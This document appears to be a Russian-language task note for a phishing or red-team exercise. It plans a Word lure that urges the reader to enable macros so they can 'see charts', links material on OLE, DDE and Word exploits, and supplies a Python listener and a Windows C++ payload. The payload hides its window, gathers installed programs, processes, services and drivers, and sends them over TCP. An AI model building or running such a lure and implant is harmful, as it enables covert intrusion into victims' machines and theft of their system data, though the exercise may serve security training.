##### Задание
1. Текст про макросы внутри доки а не в письме... Типа зделать квадратик и написать в нем *Здесь должны быть графики сравнения, если вы их не видите - активируйте макросы*
2. Оформи доку плез нормальными данными
3. Что-нибудь что не маросы мб? маленбкое но новое

### Линки, которые могут помочь
1. [Word OLE Virus](https://www.youtube.com/watch?v=deXoyOPQHf4)
2. [DDE](https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)
3. [CVE](https://xakep.ru/2017/06/06/exploits-ms-word-rce-2007-2016-218/)
4. [Безопасность Microsoft Office: Автоматизация](https://m.habr.com/company/dsec/blog/359228/)
5. [Where’s the Macro? Malware authors are now using OLE embedding to deliver malicious files](https://cloudblogs.microsoft.com/microsoftsecure/2016/06/14/wheres-the-macro-malware-author-are-now-using-ole-embedding-to-deliver-malicious-files/?source=mmpc)
6. [Link (.lnk) to Ransom](https://cloudblogs.microsoft.com/microsoftsecure/2016/05/26/link-lnk-to-ransom/?source=mmpc)

##### На следующий раз
* Вставить скрин письма в отчет

Типа сервер
```
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 27015))
s.listen(1)
conn, addr = s.accept()
while 1:
    data = conn.recv(1024)
    if not data:
        break
    print(data)
conn.close()
```

Типа payload
```
#define WIN32_LEAN_AND_MEAN
#define _WIN32_WINNT 0x0500

#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdlib.h>
#include <stdio.h>

#include <iostream>
#include <cstdio>
#include <iostream>
#include <memory>
#include <stdexcept>
#include <string>
#include <array>

#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "Mswsock.lib")
#pragma comment (lib, "AdvApi32.lib")


#define DEFAULT_BUFLEN 512
#define DEFAULT_PORT "27015"


std::string exec(const char* cmd) {
	std::array<char, 128> buffer;
	std::string result;
	std::shared_ptr<FILE> pipe(_popen(cmd, "r"), _pclose);
	if (!pipe) throw std::runtime_error("popen() failed!");
	while (!feof(pipe.get())) {
		if (fgets(buffer.data(), 128, pipe.get()) != nullptr)
			result += buffer.data();
	}
	return result;
}

int send_data(std::string &results)
{
	/* ----------------------------------------------------------------------------- */
	/* https://docs.microsoft.com/en-us/windows/desktop/winsock/complete-client-code */
	/* ----------------------------------------------------------------------------- */
	WSADATA wsaData;
	SOCKET ConnectSocket = INVALID_SOCKET;
	struct addrinfo *result = NULL,
		*ptr = NULL,
		hints;
	char *sendbuf = "this is a test";
	int iResult;

	// Initialize Winsock
	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed with error: %d\n", iResult);
		return 1;
	}

	ZeroMemory(&hints, sizeof(hints));
	hints.ai_family = AF_UNSPEC;
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_protocol = IPPROTO_TCP;

	// Resolve the server address and port
	iResult = getaddrinfo("localhost", DEFAULT_PORT, &hints, &result);
	if (iResult != 0) {
		printf("getaddrinfo failed with error: %d\n", iResult);
		WSACleanup();
		return 1;
	}

	// Attempt to connect to an address until one succeeds
	for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

		// Create a SOCKET for connecting to server
		ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
			ptr->ai_protocol);
		if (ConnectSocket == INVALID_SOCKET) {
			printf("socket failed with error: %ld\n", WSAGetLastError());
			WSACleanup();
			return 1;
		}

		// Connect to server.
		iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
		if (iResult == SOCKET_ERROR) {
			closesocket(ConnectSocket);
			ConnectSocket = INVALID_SOCKET;
			continue;
		}
		break;
	}

	freeaddrinfo(result);

	if (ConnectSocket == INVALID_SOCKET) {
		printf("Unable to connect to server!\n");
		WSACleanup();
		return 1;
	}

	// Send an initial buffer
	iResult = send(ConnectSocket, results.c_str(), (int)strlen(results.c_str()), 0);
	if (iResult == SOCKET_ERROR) {
		printf("send failed with error: %d\n", WSAGetLastError());
		closesocket(ConnectSocket);
		WSACleanup();
		return 1;
	}

	printf("Bytes Sent: %ld\n", iResult);

	// shutdown the connection since no more data will be sent
	iResult = shutdown(ConnectSocket, SD_SEND);
	if (iResult == SOCKET_ERROR) {
		printf("shutdown failed with error: %d\n", WSAGetLastError());
		closesocket(ConnectSocket);
		WSACleanup();
		return 1;
	}

	// cleanup
	closesocket(ConnectSocket);
	WSACleanup();

	return 0;
}


int main(int argc, char ** argv)
{
	HWND hWnd = GetConsoleWindow();
	ShowWindow(hWnd, SW_MINIMIZE);  //won't hide the window without SW_MINIMIZE
	ShowWindow(hWnd, SW_HIDE);

	std::string installed_progs_ps = exec("powershell \"Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize\"");
	std::string tasklist_output = exec("TASKLIST /V");
	std::string services_info = exec("SC QUERY");
	std::string drivers = exec("driverquery /V");
	/*std::string cur_dir = exec("CD");
	std::string date = exec("DATE /T");
	std::string time = exec("TIME /T");
	std::string group_policy_info = exec("GPRESULT /V");
	std::string net_info = exec("IPCONFIG /ALL");
	// std::string the_tree = exec("TREE");
	std::string version_info = exec("VER");
	std::string volumes = exec("VOL");
	std::string powercfg = exec("powercfg /Q");*/

	std::string results = installed_progs_ps + tasklist_output + services_info + drivers;
	send_data(results);
	return 0;
}

```
